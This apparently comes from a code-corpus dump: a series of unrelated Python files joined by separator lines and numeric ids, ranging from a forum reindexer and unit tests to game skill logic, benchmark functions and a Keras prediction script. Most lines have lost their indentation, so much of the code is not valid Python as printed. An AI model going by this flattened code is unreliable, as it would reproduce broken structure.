pprint("[FORUM][REINDEXER] - Updating latest post to [" + str(comment['_id']) + "]...")
response = db.forums.update(query, {'$set': updates}, upsert=True)
def update_replies(data):
query = {}
if 'tags' in data and len(data['tags']) > 0:
query.update({'category': {'$in': data['tags']}})
if 'accounts' in data and len(data['accounts']) > 0:
query.update({'author': {'$in': data['accounts']}})
sort = [("last_reply",-1),("created",-1)]
results = db.replies.find(query).sort(sort).limit(1)
for comment in results:
query = {
'_id': data['_id'],
}
updates = {
'updated': comment['created'],
'last_reply': {
'created': comment['created'],
'author': comment['author'],
'title': comment['root_title'],
'url': comment['url']
}
}
pprint("[FORUM][REINDEXER] - Updating latest reply to [" + str(comment['_id']) + "]...")
db.forums.update(query, {'$set': updates}, upsert=True)
def update_parent(data):
db.forums.update({
'_id': data['parent'],
'children._id': {'$ne': data['_id']}
}, {
'$addToSet': {
'children': {
'_id': data['_id'],
'name': data['name']
}
}
})
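# Example (illustrative values only) of the JSON document this script expects as sys.argv[1]:
#
#   {
#       "_id": "steemit",
#       "name": "Steemit",
#       "parent": "apps",                  # optional; omit for a top-level forum
#       "tags": ["steemit", "steem"],      # posts/replies in these categories are indexed
#       "accounts": ["steemitblog"]        # and/or posts/replies by these authors
#   }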
if __name__ == '__main__':
pprint("[FORUM][REINDEXER] - Starting script...")
update_forum(data)
update_posts(data)
update_replies(data)
if 'parent' in data:
update_parent(data)
|
486758
|
import TestVariables
def test_one():
TestVariables.test_value = 1
assert True
def test_two():
assert TestVariables.test_value == 1
|
486813
|
from typing import Tuple, Any, List, Iterable
from .async_transactions import has_async_execute
from .exceptions import CompensationFailure, AsyncStepUsedInSyncTransaction
from .retries import StepWithRetries, execute_step_retry
from .steps import build_step_list, StepLike, Step
def _compensate_completed_steps(completed_steps: List[Tuple[Step, Any]]):
failures = []
for (step, state) in reversed(completed_steps):
try:
step.compensate(state)
except Exception as failure:
failures.append(failure)
if failures != []:
raise CompensationFailure(failures)
def _execute_step(state, step: Step):
try:
return step.execute(state)
except Exception as e:
if isinstance(step, StepWithRetries):
return execute_step_retry(state, step, [e])
raise e
def run_transaction(steps: Iterable[StepLike], starting_state=None):
steps = build_step_list(steps)
completed_steps: List[Tuple[Step, Any]] = []
state = starting_state
try:
for step in steps:
if has_async_execute(step):
raise AsyncStepUsedInSyncTransaction
state = _execute_step(state, step)
completed_steps.append((step, state))
return state
except Exception as error:
_compensate_completed_steps(completed_steps)
raise error
|
486817
|
from setuptools import setup
from django_admin_logs import __version__
with open('README.rst') as readme_file:
README = readme_file.read()
with open('CHANGELOG.rst') as changelog_file:
CHANGELOG = changelog_file.read()
setup(
name='django-admin-logs',
version=__version__,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/radwon/django-admin-logs',
description='View, delete or disable Django admin log entries.',
long_description=README + '\n\n' + CHANGELOG,
long_description_content_type='text/x-rst',
keywords='django admin logs',
license='MIT',
packages=[
'django_admin_logs',
],
include_package_data=True,
classifiers=[
'Intended Audience :: Developers',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
'Framework :: Django',
'Environment :: Web Environment',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
python_requires='>=3.6',
install_requires=[
'Django>=2.2',
],
)
|
486844
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.mode_choice import mode_choice
def test_mode_choice():
"""Test module mode_choice.py by downloading
mode_choice.csv and testing shape of
extracted data has 840 rows and 7 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = mode_choice(test_path)
try:
assert x_train.shape == (840, 7)
except:
shutil.rmtree(test_path)
raise
|
486970
|
from skills import skillsets
class SkillHandler():
def __init__(self, owner):
self.owner = owner
self.generate_skillset_dics()
def generate_skillset_dics(self):
owner = self.owner
skillset_dics = {}
for i in skillsets.VIABLE_SKILLSETS:
if owner.attributes.has(i):
skillset_dic = dict(owner.attributes.get(i))
skillset_dics[i] = skillset_dic
self.skillset_dics = skillset_dics
def generate_ap(self):
ap_granted = 1
# Here is where modifiers will kick in, such as rolling for the chance at extra AP.
return ap_granted
def ap_required(self, desired_rank):
ap_per_rank = 100
count = 0
for _ in range(2, desired_rank+1):
count += 1
if count == 20:
ap_per_rank += 10
count = 0
return ap_per_rank
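# Illustrative values for ap_required: the per-rank cost starts at 100 AP and rises by 10
# every 20 ranks, e.g. ap_required(10) == 100, ap_required(21) == 110, ap_required(41) == 120.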
def return_rank_score(self, rank, difficulty):
if difficulty == 'easy':
rs = skillsets.easy_rs
elif difficulty == 'average':
rs = skillsets.average_rs
elif difficulty == 'difficult':
rs = skillsets.difficult_rs
elif difficulty == 'impossible':
rs = skillsets.impossible_rs
rs = rs[rank - 1]
return rs
def return_defense_skills(self, skillset, rs_only=False, skills_only=False):
high_rs, mid_rs, low_rs = 0, 0, 0
high_skill, mid_skill, low_skill = '', '', ''
rank = 0
difficulty = ''
defense_skill_list = []
skills = [*self.skillset_dics[skillset]] # Create a list of the skill names.
# Check each key in the dictionary against all viable skills.
for i in skills:
if i in skillsets.skillsets[skillset]:
# Skill is in the main dictionary. Check if it's a defense skill.
if skillsets.skillsets[skillset][i]['skill_type'] == 'defense':
defense_skill_list.append(i)
# Sort each defensive skill by region defended.
for i in defense_skill_list:
rank = self.return_skill_rank(skillset, i)
difficulty = skillsets.skillsets[skillset][i]['difficulty']
if skillsets.skillsets[skillset][i]['default_aim'] == 'high':
high_rs = self.return_rank_score(rank, difficulty)
high_skill = skillsets.skillsets[skillset][i]['uid']
elif skillsets.skillsets[skillset][i]['default_aim'] == 'mid':
mid_rs = self.return_rank_score(rank, difficulty)
mid_skill = skillsets.skillsets[skillset][i]['uid']
elif skillsets.skillsets[skillset][i]['default_aim'] == 'low':
low_rs = self.return_rank_score(rank, difficulty)
low_skill = skillsets.skillsets[skillset][i]['uid']
# Return the values
if rs_only == True:
return high_rs, mid_rs, low_rs
elif skills_only == True:
return high_skill, mid_skill, low_skill
else:
return high_rs, mid_rs, low_rs, high_skill, mid_skill, low_skill
def defense_layer_calc(self, rs_only=False, skills_only=False):
"""
Defensive rank score includes up to 3 layers of defense.
The highest RS defensive maneuver of each of high, mid, and low gains 100% of its RS.
The second highest RS supplies 50% and the third is only worth 33%.
Each layer can only consist of a single defensive maneuver from each of the following categories:
Weapon Blocks, Combat Maneuver Dodges, and Shield Blocks.
Weapons that require 2 hands can only ever gain 2 defensive layers.
Shields or offhand weapons are the only way to gain all 3 layers.
For Example:
Staves Mid Block with 100 rank score * 1 = 100
CM Mid Dodge with 80 rank score * 0.5 = 40
Total Mid Defensive rank score = 140
Swords Mid Block with 100 rank score * 0.33 = 33
CM Mid Dodge with 150 rank score * 0.5 = 75
Shield Mid Block with 200 rank score * 1 = 200
Total Mid Defensive rank score = 308
Floats are used to determine the highest RS priority, but only rounded down integers are used to determine the total RS.
TODO: Add a round down for the final RS.
High, Mid, and Low always refer to the area
of the body that the attack targets and not the numerical value.
"""
owner = self.owner
weap_high_skill, weap_mid_skill, weap_low_skill = None, None, None
offhand_high_skill, offhand_mid_skill, offhand_low_skill = None, None, None
dodge_high_skill, dodge_mid_skill, dodge_low_skill = None, None, None
# Initialize rankscore values.
weap_high_rs, weap_mid_rs, weap_low_rs = 0.0, 0.0, 0.0
offhand_high_rs, offhand_mid_rs, offhand_low_rs = 0.0, 0.0, 0.0
dodge_high_rs, dodge_mid_rs, dodge_low_rs = 0.0, 0.0, 0.0
# Acquire the item(s) wielded.
if owner.attributes.has('wielding'):
wielding = owner.attributes.get('wielding')
main_wield = wielding.get('main')
off_wield = wielding.get('off')
b_wield = wielding.get('both')
if b_wield:
if b_wield.attributes.has('skillset'):
item_skillset = b_wield.attributes.get('skillset')
weap_high_rs, weap_mid_rs, weap_low_rs = self.return_defense_skills(item_skillset, rs_only=True)
weap_high_skill, weap_mid_skill, weap_low_skill = self.return_defense_skills(item_skillset, skills_only=True)
if main_wield:
if main_wield.attributes.has('skillset'):
item_skillset = main_wield.attributes.get('skillset')
weap_high_rs, weap_mid_rs, weap_low_rs = self.return_defense_skills(item_skillset, rs_only=True)
weap_high_skill, weap_mid_skill, weap_low_skill = self.return_defense_skills(item_skillset, skills_only=True)
if off_wield:
if off_wield.attributes.has('skillset'):
item_skillset = off_wield.attributes.get('skillset')
offhand_high_rs, offhand_mid_rs, offhand_low_rs = self.return_defense_skills(item_skillset, rs_only=True)
offhand_high_skill, offhand_mid_skill, offhand_low_skill = self.return_defense_skills(item_skillset, skills_only=True)
# Get all dodge rank scores
if owner.attributes.has('martial arts'):
dodge_high_skill, dodge_mid_skill, dodge_low_skill = self.return_defense_skills('martial arts', skills_only=True)
dodge_high_rs, dodge_mid_rs, dodge_low_rs = self.return_defense_skills('martial arts', rs_only=True)
high_skills = [weap_high_skill, offhand_high_skill, dodge_high_skill]
mid_skills = [weap_mid_skill, offhand_mid_skill, dodge_mid_skill]
low_skills = [weap_low_skill, offhand_low_skill, dodge_low_skill]
# High Layer
h_rs = [weap_high_rs, offhand_high_rs, dodge_high_rs]
h_rs.sort(reverse=True)
h_layer1 = h_rs[0] * 1
h_layer2 = h_rs[1] * 0.5
h_layer3 = h_rs[2] * 0.33
high_def_rs = (h_layer1 + h_layer2 + h_layer3)
# Mid Layer
m_rs = [weap_mid_rs, offhand_mid_rs, dodge_mid_rs]
m_rs.sort(reverse=True)
m_layer1 = m_rs[0] * 1
m_layer2 = m_rs[1] * 0.5
m_layer3 = m_rs[2] * 0.33
mid_def_rs = (m_layer1 + m_layer2 + m_layer3)
# Low Layer
l_rs = [weap_low_rs, offhand_low_rs, dodge_low_rs]
l_rs.sort(reverse=True)
l_layer1 = l_rs[0] * 1
l_layer2 = l_rs[1] * 0.5
l_layer3 = l_rs[2] * 0.33
low_def_rs = (l_layer1 + l_layer2 + l_layer3)
if rs_only:
return high_def_rs, mid_def_rs, low_def_rs
elif skills_only:
return high_skills, mid_skills, low_skills
else:
return high_skills, mid_skills, low_skills, high_def_rs, mid_def_rs, low_def_rs
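    # Worked example of the layering above (illustrative numbers, not taken
    # from game data): if the mid defenses are a weapon block with RS 100, a
    # shield block with RS 200 and a dodge with RS 150, the sorted list is
    # [200, 150, 100], so mid_def_rs = 200 * 1 + 150 * 0.5 + 100 * 0.33 = 308.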
def rs_stance(self, o_rs, d_rs, stance):
'''
o_rs = Offensive rank score
d_rs = Defensive rank score
Berserk - Attack 100% | Defense: 0%
Aggressive - Attack 75% | Defense: 25%
Normal - Attack 50% | Defense: 50%
Wary - Attack 25% | Defense: 75%
Defensive - Attack 0% | Defense: 100%
'''
if stance == 'berserk':
o_rs = o_rs * 1
d_rs = d_rs * 0
return o_rs, d_rs
if stance == 'aggressive':
o_rs = o_rs * 0.75
d_rs = d_rs * 0.25
return o_rs, d_rs
if stance == 'normal':
o_rs = o_rs * 0.5
d_rs = d_rs * 0.5
return o_rs, d_rs
if stance == 'wary':
o_rs = o_rs * 0.25
d_rs = d_rs * 0.75
return o_rs, d_rs
if stance == 'defensive':
o_rs = o_rs * 0
d_rs = d_rs * 1
return o_rs, d_rs
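    # Example with hypothetical values: rs_stance(100, 80, 'aggressive')
    # returns (75.0, 20.0), i.e. 75% of the offensive RS and 25% of the
    # defensive RS.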
def return_damage_type(self, skillset, skill):
if skillset in skillsets.VIABLE_SKILLSETS:
if skill in skillsets.skillsets[skillset]:
damage_type = skillsets.skillsets[skillset][skill]['damage_type']
return damage_type
def return_default_aim(self, skillset, skill):
if skillset in skillsets.VIABLE_SKILLSETS:
if skill in skillsets.skillsets[skillset]:
default_aim = skillsets.skillsets[skillset][skill]['default_aim']
return default_aim
def learn_skillset(self, skillset):
owner = self.owner
# Check if the skillset is not already learned and if not, create it.
if skillset not in self.skillset_dics:
self.generate_fresh_skillset(skillset)
owner.msg(f"You learn {skillset}.")
else:
owner.msg(f"You already know {skillset}!")
def generate_fresh_skillset(self, skillset, starting_rank=1):
owner = self.owner
starting_skillsets = skillsets.STARTING_SKILLSETS
base_dic = {'base ranks': starting_rank, 'bonus ranks': 0, 'current ap': 0}
owner.attributes.add(skillset, {**base_dic, **starting_skillsets[skillset]})
self.skillset_dics[skillset] = {**base_dic, **starting_skillsets[skillset]}
def grant_action_points(self, skillset):
owner = self.owner
if skillset in self.skillset_dics:
owner_skillset_saverdic = owner.attributes.get(skillset)
base_ranks = self.skillset_dics[skillset]['base ranks']
current_ap = self.skillset_dics[skillset]['current ap']
desired_rank = base_ranks + 1
ap_gain = self.generate_ap()
total_ap = current_ap + ap_gain
ap_req = self.ap_required(desired_rank)
if total_ap >= ap_req: # Level up!
ap_diff = total_ap - ap_req
owner_skillset_saverdic['current ap'] = ap_diff
self.skillset_dics[skillset]['current ap'] = ap_diff
owner_skillset_saverdic['base ranks'] = base_ranks + 1
self.skillset_dics[skillset]['base ranks'] = base_ranks + 1
owner.msg(f"You have reached the base rank of {self.skillset_dics[skillset]['base ranks']} in {skillset}!")
else:
owner_skillset_saverdic['current ap'] = total_ap
self.skillset_dics[skillset]['current ap'] = total_ap
owner.msg(f"You have gained {ap_gain} AP toward your {skillset} skillset with {ap_req - total_ap} AP remaining to level.")
def return_skill_rank(self, skillset, skill):
"""
        Looks to see if the owner possesses a specified skillset.
Generates a dictionary specific to that skillset and adds the base and bonus ranks.
Uses the total skillset ranks as a base rank for the skill.
Final skill rank is a result of the skill rank added to the total skillset ranks.
"""
skill_rank = 0
if skillset in self.skillset_dics:
skillset_dic = self.skillset_dics[skillset]
skillset_base_rank = skillset_dic['base ranks']
skillset_bonus_rank = skillset_dic['bonus ranks']
skillset_rank = skillset_base_rank + skillset_bonus_rank
if skill in skillset_dic:
skill_bonus_rank = skillset_dic[skill]
skill_rank = skillset_rank + skill_bonus_rank
return skill_rank
def generate_skill_list(self):
"""
Desired Outcome
=====[Skills]=====================================
{skillset_name}
-------------------------------
Offense:
{skill_name} Rank: {rank} Rank Score: {rank_score}
Defense:
==================================================
"""
cap = str.capitalize
offense_skill_list = []
defense_skill_list = []
utility_skill_list = []
offense_rank_list = []
defense_rank_list = []
utility_rank_list = []
offense_skill_base_rank_list = []
defense_skill_base_rank_list = []
utility_skill_base_rank_list = []
offense_skill_bonus_rank_list = []
defense_skill_bonus_rank_list = []
utility_skill_bonus_rank_list = []
offense_rank_score_list = []
defense_rank_score_list = []
utility_rank_score_list = []
offense_skill_string_list = []
defense_skill_string_list = []
utility_skill_string_list = []
skillset_string_list = []
skill_base_rank = 0
skill_bonus_rank = 0
skill_rank = 0
skill_rank_score = 0.0
skill_difficulty = ''
num = 0
offense_skill_string = ""
defense_skill_string = ""
utility_skill_string = ""
full_skillsets_string = ""
header = "=====[|gSkills|n]====================================="
footer = "=================================================="
for i in skillsets.VIABLE_SKILLSETS:
# We reset the skill lists at the start of each new skillset iteration.
offense_skill_string = ""
defense_skill_string = ""
utility_skill_string = ""
offense_skill_list = []
defense_skill_list = []
utility_skill_list = []
offense_rank_list = []
defense_rank_list = []
utility_rank_list = []
offense_skill_base_rank_list = []
defense_skill_base_rank_list = []
utility_skill_base_rank_list = []
offense_skill_bonus_rank_list = []
defense_skill_bonus_rank_list = []
utility_skill_bonus_rank_list = []
offense_rank_score_list = []
defense_rank_score_list = []
utility_rank_score_list = []
offense_skill_string_list = []
defense_skill_string_list = []
utility_skill_string_list = []
if i in self.skillset_dics: # If the skillset exists on the character.
base_ranks = self.skillset_dics[i]['base ranks']
bonus_ranks = self.skillset_dics[i]['bonus ranks']
skill_base_rank = base_ranks + bonus_ranks
current_ap = self.skillset_dics[i]['current ap']
next_rank_ap_req = self.ap_required(base_ranks + 1)
ap_remaining = next_rank_ap_req - current_ap
# Build skill lists
for x in skillsets.VIABLE_SKILLS:
if x in self.skillset_dics[i]: # If the skill exists on the character.
skill_bonus_rank = self.skillset_dics[i][x] # Store that skill's bonus
skill_rank = self.return_skill_rank(i, x)
skill_difficulty = skillsets.skillsets[i][x]['difficulty']
skill_rank_score = self.return_rank_score(skill_rank, skill_difficulty)
# Store the skill's name in a list, sorted by skill type.
if skillsets.skillsets[i][x]['skill_type'] == 'offense':
offense_skill_list.append(x)
offense_skill_base_rank_list.append(skill_base_rank)
offense_skill_bonus_rank_list.append(skill_bonus_rank)
offense_rank_list.append(skill_rank)
offense_rank_score_list.append(skill_rank_score)
elif skillsets.skillsets[i][x]['skill_type'] == 'defense':
defense_skill_list.append(x)
defense_skill_base_rank_list.append(skill_base_rank)
defense_skill_bonus_rank_list.append(skill_bonus_rank)
defense_rank_list.append(skill_rank)
defense_rank_score_list.append(skill_rank_score)
elif skillsets.skillsets[i][x]['skill_type'] == 'utility':
utility_skill_list.append(x)
utility_skill_base_rank_list.append(skill_base_rank)
utility_skill_bonus_rank_list.append(skill_bonus_rank)
utility_rank_list.append(skill_rank)
utility_rank_score_list.append(skill_rank_score)
# Build this skillset's string.
skillset_title = (f"\n\n|g{cap(i)}|n - Base Ranks: |g{base_ranks}|n Bonus Ranks: |g{bonus_ranks}|n\n"
f"Current ap: {current_ap} Rank {base_ranks + 1} AP Requirement: {next_rank_ap_req} Required AP Remaining: |c{ap_remaining}|n\n"
"--------------------------------------------------")
num = 0
for v in offense_skill_list:
offense_skill_string_list.append(f"|G{cap(v)}|n Base Rank: |G{offense_skill_base_rank_list[num]}|n Bonus Ranks: |G{offense_skill_bonus_rank_list[num]}|n Rank: |G{offense_rank_list[num]}|n Rank Score: |G{offense_rank_score_list[num]}|n\n")
num += 1
if len(offense_skill_string_list) > 0:
offense_skill_string = f"\nOffense:\n{''.join(offense_skill_string_list)}"
num = 0
for v in defense_skill_list:
defense_skill_string_list.append(f"|G{cap(v)}|n Base Rank: |G{defense_skill_base_rank_list[num]}|n Bonus Ranks: |G{defense_skill_bonus_rank_list[num]}|n Rank: |G{defense_rank_list[num]}|n Rank Score: |G{defense_rank_score_list[num]}|n\n")
num += 1
if len(defense_skill_string_list) > 0:
defense_skill_string = f"\nDefense:\n{''.join(defense_skill_string_list)}"
num = 0
for v in utility_skill_list:
utility_skill_string_list.append(f"|G{cap(v)}|n Base Rank: |G{utility_skill_base_rank_list[num]}|n Bonus Ranks: |G{utility_skill_bonus_rank_list[num]}|n Rank: |G{utility_rank_list[num]}|n Rank Score: |G{utility_rank_score_list[num]}|n\n")
num += 1
if len(utility_skill_string_list) > 0:
utility_skill_string = f"\nUtility:\n{''.join(utility_skill_string_list)}"
skillset_string_list.append(f"{skillset_title}{offense_skill_string}{defense_skill_string}{utility_skill_string}")
# Now we compile the final list.
full_skillsets_string = ''.join(skillset_string_list)
# Current total defensive rank scores.
high_def_rs, mid_def_rs, low_def_rs = self.defense_layer_calc(rs_only=True)
def_rs = f"\n\nCurrent total defensive RS - High: {high_def_rs} Mid: {mid_def_rs} Low: {low_def_rs}\n"
result = f"{header}{full_skillsets_string}{def_rs}\n{footer}"
return result
|
486988
|
import pytest
import autofit as af
from autofit import database as db
@pytest.fixture(
name="gaussian_0"
)
def make_gaussian_0(
session
):
gaussian_0 = db.Fit(
id="gaussian_0",
instance=af.Gaussian(
centre=1
),
info={"info": 1},
is_complete=True,
unique_tag="zero"
)
session.add(gaussian_0)
session.commit()
return gaussian_0
def test_order_by(
aggregator,
gaussian_1,
gaussian_2,
gaussian_0
):
assert aggregator.order_by(
aggregator.search.unique_tag
) == [gaussian_1, gaussian_2, gaussian_0]
def test_reversed(
aggregator,
gaussian_1,
gaussian_2,
gaussian_0
):
assert aggregator.order_by(
aggregator.search.unique_tag,
reverse=True
) == [gaussian_0, gaussian_2, gaussian_1]
def test_boolean(
aggregator,
gaussian_1,
gaussian_2
):
assert aggregator.order_by(
aggregator.search.is_complete
) == [gaussian_2, gaussian_1]
assert aggregator.order_by(
aggregator.search.is_complete,
reverse=True
) == [gaussian_1, gaussian_2]
def test_combined(
aggregator,
gaussian_1,
gaussian_2,
gaussian_0
):
assert aggregator.order_by(
aggregator.search.is_complete
).order_by(
aggregator.search.unique_tag
) == [gaussian_2, gaussian_1, gaussian_0]
|
487011
|
from ..base import Mod
from ..mixins import (
ViewMixin,
make_blueprint_mixin,
IdentityGuessNameMixin,
make_field_guess_name_mixin
)
from ..booru.mixins import BooruMixin
name = 'yandere'
class Yandere(
ViewMixin,
BooruMixin,
make_blueprint_mixin(__name__),
make_field_guess_name_mixin('uri', 'query'),
IdentityGuessNameMixin,
Mod
):
name = name
display_name = 'yande.re'
has_advanced_search = False
    description = 'High-definition anime image board. Subscribe to a link or keywords to receive new images as soon as they are posted.'
    normal_search_prompt = 'subscription URL/tags'
allow_empty_query = True
posts_url = 'https://yande.re/post'
post_uri_template = 'https://yande.re/post/show/{}'
referer = 'https://yande.re/'
frontend_need_init = True
@property
def carousel(self):
from flask import url_for
return url_for("main.example_search", kind=name, q="https://yande.re/post?tags=rating%3As")
@staticmethod
def tags(post):
return post.tags
@staticmethod
def preview_url(post):
return post.preview_url
@property
def frontend_options(self):
from flask import url_for
from ...core.local import get_current_conf
return {
'completion_options_uri': url_for("main.completion_options", kind=name),
'completion_cache_timeout': get_current_conf()['TORABOT_MOD_YANDERE_COMPLETION_CACHE_TIMEOUT']
}
@property
def completion_options(self):
import json
from ...core.backends.redis import Redis
from ...core.local import get_current_conf
from ..query import query
q = query(
kind=name,
text=json.dumps(dict(method='tags')),
timeout=get_current_conf()['TORABOT_SPY_TIMEOUT'],
sync_on_expire=False,
make_backend=lambda conn: Redis()
)
if not q:
            raise Exception('get completion of yandere failed')
return q.content
def spy(self, query, timeout):
from ..booru.query import parse, regular
if parse(query).method == 'tags':
spy = super(BooruMixin, self).spy
else:
spy = super(Yandere, self).spy
return spy(regular(query), timeout)
def changes(self, old, new, **kargs):
if new.query.method == 'tags':
return
yield from super(Yandere, self).changes(old, new)
def sync_on_expire(self, query):
from ..booru.query import parse
return parse(query.text).method != 'tags'
def regular(self, query_text):
from ..booru.query import regular
return self.name, regular(query_text)
|
487014
|
def is_anagram(a, b):
    # Two strings are anagrams when they contain exactly the same characters
    # with the same counts; comparing the sorted characters checks that.
    return sorted(a) == sorted(b)
print(is_anagram("apple", "palpe"))
print(is_anagram("applex", "palpe"))
|
487052
|
import numpy
__all__ = [
"ackley",
"griewank",
"quartic",
"rastrigin",
"rosenbrock",
"sphere",
"styblinski_tang",
]
def ackley(x):
"""
The Ackley function.
Parameters
----------
x : array_like
1-D array of points at which the Ackley function is to be computed.
Returns
-------
float
The value of the Ackley function.
"""
x = numpy.asarray(x)
ndim = x.size
e = 2.7182818284590451
sum1 = numpy.sqrt(1.0 / ndim * numpy.square(x).sum())
sum2 = 1.0 / ndim * numpy.cos(2.0 * numpy.pi * x).sum()
return 20.0 + e - 20.0 * numpy.exp(-0.2 * sum1) - numpy.exp(sum2)
def griewank(x):
"""
The Griewank function.
Parameters
----------
x : array_like
1-D array of points at which the Griewank function is to be computed.
Returns
-------
float
The value of the Griewank function.
"""
x = numpy.asarray(x)
ndim = x.size
sum1 = numpy.square(x).sum() / 4000.0
prod1 = numpy.prod(numpy.cos(x / numpy.sqrt(numpy.arange(1, ndim + 1))))
return 1.0 + sum1 - prod1
def quartic(x):
"""
The Quartic function.
Parameters
----------
x : array_like
1-D array of points at which the Quartic function is to be computed.
Returns
-------
float
The value of the Quartic function.
"""
x = numpy.asarray(x)
ndim = x.size
return (numpy.arange(1, ndim + 1) * numpy.power(x, 4)).sum()
def rastrigin(x):
"""
The Rastrigin function.
Parameters
----------
x : array_like
1-D array of points at which the Rastrigin function is to be computed.
Returns
-------
float
The value of the Rastrigin function.
"""
x = numpy.asarray(x)
ndim = x.size
sum1 = (numpy.square(x) - 10.0 * numpy.cos(2.0 * numpy.pi * x)).sum()
return 10.0 * ndim + sum1
def rosenbrock(x):
"""
The Rosenbrock function.
Parameters
----------
x : array_like
1-D array of points at which the Rosenbrock function is to be computed.
Returns
-------
float
The value of the Rosenbrock function.
"""
x = numpy.asarray(x)
sum1 = ((x[1:] - x[:-1] ** 2) ** 2).sum()
sum2 = numpy.square(1.0 - x[:-1]).sum()
return 100.0 * sum1 + sum2
def sphere(x):
"""
The Sphere function.
Parameters
----------
x : array_like
1-D array of points at which the Sphere function is to be computed.
Returns
-------
float
The value of the Sphere function.
"""
return numpy.square(x).sum()
def styblinski_tang(x):
"""
The Styblinski-Tang function.
Parameters
----------
x : array_like
1-D array of points at which the Styblinski-Tang function is to be computed.
Returns
-------
float
The value of the Styblinski-Tang function.
"""
x = numpy.asarray(x)
sum1 = (numpy.power(x, 4) - 16.0 * numpy.square(x) + 5.0 * x).sum()
return 0.5 * sum1 + 39.16599 * x.size
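# Minimal sanity-check sketch (not part of the original module): every
# benchmark should evaluate to (approximately) zero at its known global
# minimum.
if __name__ == "__main__":
    assert sphere([0.0, 0.0, 0.0]) == 0.0
    assert abs(ackley([0.0, 0.0])) < 1e-12
    assert rastrigin([0.0, 0.0]) == 0.0
    assert rosenbrock([1.0, 1.0, 1.0]) == 0.0
    assert griewank([0.0, 0.0, 0.0]) == 0.0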
|
487063
|
OPEN = 'Open'
IN_PROGRESS = 'In Progress'
DUE_SOON = 'Due Soon'
OVERDUE = 'Overdue'
CLOSED = 'Closed'
|
487095
|
import logging
def get_logger(level: int = logging.DEBUG) -> logging.Logger:
logger = logging.getLogger("awscliv2")
if logger.handlers:
return logger
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(
logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
)
stream_handler.setLevel(level)
logger.addHandler(stream_handler)
logger.setLevel(level)
return logger
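# Usage sketch (hypothetical message text): the guard on logger.handlers means
# repeated calls return the same configured logger without duplicating output.
#   logger = get_logger(logging.INFO)
#   logger.info("starting up")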
|
487120
|
import SimpleITK
from keras.models import load_model
from util_3d import *
import sys
'''
Parameters
encodedPrediction - the one hot encoded label to use to predict
labels - labels for the prediction
Transform encodedPredictions to a dictionary of labeled data
'''
def getLabelPrediction(encodedPrediction, labels=['Less than 250 Days', '250 to 500 Days', 'More than 500 Days']):
formattedLabels = []
numberOfLabels = len(encodedPrediction[0])
for index in range(0, numberOfLabels):
formattedLabels.append("%.2f" % round((encodedPrediction[0][index] * 100), 2))
labelPrediction = {}
for index in range(0, len(labels)):
labelPrediction[labels[index]] = formattedLabels[index]
print(labelPrediction)
return labelPrediction
'''
Parameters
model_filepath - location of the trained model
tumor_img_filepath - location of the datafile
Trim and reshape tumor img
Get encoded prediction of labels based off model
'''
def getEncodedPrediction(model_filepath, tumor_img_filepath, dim=(50,80,80)):
model = load_model(model_filepath)
input_image = SimpleITK.ReadImage(tumor_img_filepath)
rawArray = SimpleITK.GetArrayFromImage(input_image)
trimmedArray = trim_array_3d(rawArray, dim)
img_depth = len(trimmedArray)
img_cols = len(trimmedArray[0])
img_rows = len(trimmedArray[0][0])
nb_channels = 1
nb_samples = 1
inputData = trimmedArray.reshape(nb_samples, img_depth, img_cols, img_rows, nb_channels)
encodedPrediction = model.predict(inputData)
print(encodedPrediction)
return encodedPrediction
'''
Parameters
model_filepath - location of the trained model
tumor_img_filepath - location of the datafile
'''
if __name__ == "__main__":
model_filepath = sys.argv[1]
tumor_img_filepath = sys.argv[2]
encodedPrediction = getEncodedPrediction(model_filepath, tumor_img_filepath)
labelPrediction = getLabelPrediction(encodedPrediction)
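# Invocation sketch (file names are hypothetical): the script takes the model
# path and the tumor image path as positional arguments, e.g.
#   python predict.py trained_model.h5 tumor_volume.mha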
|
487166
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import math
#Reads deformations.txt, generated via
#`casm query -k 'struc_score(PRIM,basis_score)' 'struc_score(PRIM,lattice_score)' 'struc_score(../NiAl-B2/PRIM-true.vasp,basis_score)' 'struc_score(../NiAl-B2/PRIM-true.vasp,lattice_score)' 'struc_score(../NiAl-HCP/PRIM,basis_score)' 'struc_score(../NiAl-HCP/PRIM,lattice_score)' relaxation_strain comp atom_frac -c selections/enumerated.json -o deformations.txt`
#Load everything as a string
stringdump=np.genfromtxt("./deformations.txt", dtype="S25")
names=stringdump[:,0]
#Recast data as float
datadump=np.array(stringdump[:,2:-1],dtype=float)
#take views of relevant columns
FCCscore=datadump[:,0]+datadump[:,1]
BCCscore=datadump[:,2]+datadump[:,3]
HCPscore=datadump[:,4]+datadump[:,5]
E11=datadump[:,6]
E22=datadump[:,7]
E33=datadump[:,8]
#Calculate strain order parameters
eta3=-(E11+E22-2*E33)/math.sqrt(6)
eta2=(E11-E22)/math.sqrt(2)
etadump=np.vstack((names,eta2,eta3)).T
np.savetxt("etadump.txt",etadump,fmt="%s")
etamat=np.array([eta2,eta3]).T
#Bin structures by type of PRIM
scoremat=np.vstack((FCCscore,BCCscore,HCPscore)).T
bestscore=np.array([np.argmin(row) for row in scoremat]) #0=FCC. 1=BCC, 2=HCP
#Write the scores out for each structure
strucscores=np.vstack((names,bestscore.astype(str))).T
np.savetxt("./strucscores.txt", strucscores,fmt="%s")
colordict={0:'r',1:'g',2:'b'}
colorscore=[]
for score in bestscore:
colorscore.append(colordict[score])
#Apply symmetry to strain order parameters
mirrortrans=np.array([[-1,0],[0,1]])
rottrans=np.array([[-0.5, -0.5*math.sqrt(3)],[0.5*math.sqrt(3),-0.5]])
etarotmat1=np.dot(etamat,rottrans)
etarotmat2=np.dot(etarotmat1,rottrans)
etarotmat=np.vstack((etamat,etarotmat1,etarotmat2))
etamirrormat=np.dot(etarotmat,mirrortrans)
redundantcolorscore=np.array(3*colorscore)
#Specify maximum radius in eta space to get configurations from
#maxrad=0.085
#radmat=np.sqrt(eta2*eta2+eta3*eta3)
#centeredidx=[radmat < maxrad]
#plot the results
fig=plt.figure()
ax=fig.add_subplot(111)
#plot symmetrized metrics
